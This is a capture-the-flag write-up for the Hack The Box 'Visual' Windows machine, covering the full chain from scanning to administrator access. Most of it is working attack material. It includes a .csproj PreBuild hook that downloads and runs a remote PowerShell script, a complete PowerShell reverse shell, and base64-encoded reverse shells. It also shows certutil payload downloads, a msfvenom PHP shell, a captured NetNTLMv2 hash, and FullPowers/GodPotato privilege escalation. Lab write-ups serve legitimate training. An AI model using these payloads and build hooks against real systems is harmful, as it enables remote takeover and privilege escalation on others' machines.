Visual - Medium HTB

• OS: Windows
• Difficulty: Medium
• Author: 4nh4ck1ne

scanning :

basic nmap scan : nmap -sW -sC -sV -T4 -Pn target_ip

80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|*http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
| http-enum:
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.56 (win64) openssl/1.1.1t php/8.1.17'
|   /icons/: Potentially interesting folder w/ directory listing
|*  /js/: Potentially interesting directory w/ listing on 'apache/2.4.56 (win64) openssl/1.1.1t php/8.1.17'

enumeration:

interesting web page : gobuster dir -u http://target_ip/ -w /usr/share/wordlists/dirb/big.txt -t50

/uploads              (Status: 301) [Size: 343] [--> http://10.129.157.242/uploads/]
/submit.php           (Status: 200) [Size: 0]
/assets               (Status: 301) [Size: 342] [--> http://10.129.157.242/assets/]
/css                  (Status: 301) [Size: 339] [--> http://10.129.157.242/css/]
/Index.php            (Status: 200) [Size: 7534]
/js                   (Status: 301) [Size: 338] [--> http://10.129.157.242/js/]

Exploit :

Create a Visual project : dotnet new console -n exploit -f net6.0

Create the .sln file : dotnet new sln --name exploit

add the .sln on the project : dotnet sln add ../exploit

Create the git depot on the same directory:

git init 

git add .

#give a good permission
chmod 777 * 

#first commmit
git commit -m "update"

#update the server
git update-server-info

Run the python web server :

python3 -m http.server 80

on the web app enter your serveur adresse to compile the project :

this .csproj as work for to execute a powershell reverse shell:

<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

 <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
   <Exec Command="powershell IEX (New-Object System.Net.Webclient).DownloadString('http://attacker_ip/reverse.ps1')" />
 </Target>

</Project>

the powershell reverse shell :

do {
    # Delay before establishing network connection, and between retries
    Start-Sleep -Seconds 1

    # Connect to C2
    try{
        $TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.2', 13337)
    } catch {}
} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)

# Writes a string to C2
function WriteToStream ($String) {
    # Create buffer to be used for next network stream read. Size is determined by the TCP client recieve buffer (65536 by default)
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}

    # Write to C2
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}

# Initial output to C2. The function also creates the inital empty byte array buffer used below.
WriteToStream ''

# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    # Encode command, remove last byte/newline
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    
    # Execute command and save output (including errors thrown)
    $Output = try {
            Invoke-Expression $Command 2>&1 | Out-String
        } catch {
            $_ | Out-String
        }

    # Write output to C2
    WriteToStream ($Output)
}
# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()

Don’t forget to init the git depot and run your web server !

run your listener : nc -lnvp 4444

Enter the web adress on the web and BIIM enjoy your reverse and user flag ! 😎

Privilege escalation :

Switch to another shell :

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANQA1ADUANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

#run your nc 
nc -lnvp 5555

Lets run a winpeas.exe

Download the .exe :

certutil -urlcache -f [http://10.10.16.2:800/winPEASany.exe](http://10.10.16.2/winPEASany.exe) winPEASany.exe

NTLMv2 hash enox :

???????????? Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    enox::VISUAL:1122334455667788:53aecbcd1a9c0b3231498b11c48ca12f:0101000000000000f29a317c1f13da011fb6ad2ff4bc475b0000000008003000300000000000000000000000003000002c785e2b78af2f96d3c944421407d60a2362308bb18673f3b05785a57ad49de60a00100000000000000000000000000000000000090000000000000000000000

Potential Dll Hijacking :

???????????? Interesting Services -non Microsoft-
? Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    ApacheHTTPServer(Apache Software Foundation - Apache HTTP Server)["C:\Xampp\apache\bin\httpd.exe" -k runservice] - Auto - Running
    File Permissions: Everyone [AllAccess]
    Possible DLL Hijacking in binary folder: C:\Xampp\apache\bin (Everyone [AllAccess], Users [AppendData/CreateDirectories WriteData/CreateFiles])
    Apache/2.4.56 (Win64)

Winpeas tell us that we have every right on file c: xampp so Upload a php reverse shell on the web server directory because it is writable :

#create the reverse .php
msfvenom -p php/reverse_php LHOST=10.10.16.2 LPORT=9001 -o shell.php

#Download it on the web directory 
cd C:\xampp\htdocs
certutil -urlcache -f http://10.10.16.2:800/shell.php shell.php

#lauche on listener 
nc -lnvp 9001

whoami 
nt authority\local service

#switch to good shell on the 4447 port
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

We have now accessed a user type “services” but it has restricted privileges, you can use FullPower.exe to recover initial Privileges:

#Download the exeutable https://github.com/itm4n/FullPowers
certutil -urlcache -f http://10.10.16.2:800/FullPowers.exe FullPowers.exe

#Download nc.exe
certutil -urlcache -f http://10.10.16.2:800/nc.exe nc.exe

#lauch a listener 
nc -lnvp 4445

#Run 
./FullPoowers.exe -c "C:\tmp\nc.exe 10.10.16.2 4446 -e cmd" -z
[+] Started dummy thread with id 4928
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK

View the new right on the system :

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege       Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

OK you can try Impresonnate token with PrintSpoofer.exe But for me that dosent work :

#Download the executable 
certutil -urlcache -f http://10.10.16.2:800/PrintSpoofer.exe PrintSpoofer.exe

#Run and enjoy your Admin access ! 
PrintSpoofer.exe -c "C:\tmp\nc.exe 10.10.16.2 4443 -e cmd"

An alternative that worked for me is Godpopato:

certutil -urlcache -f http://10.10.16.2:800/GodPotato-NET4.exe godpotato.exe

#read admin flag 
godpotato.exe -cmd "cmd /c more C:\Users\Administrator\Desktop\root.txt"

Your Admin now Congrat !😼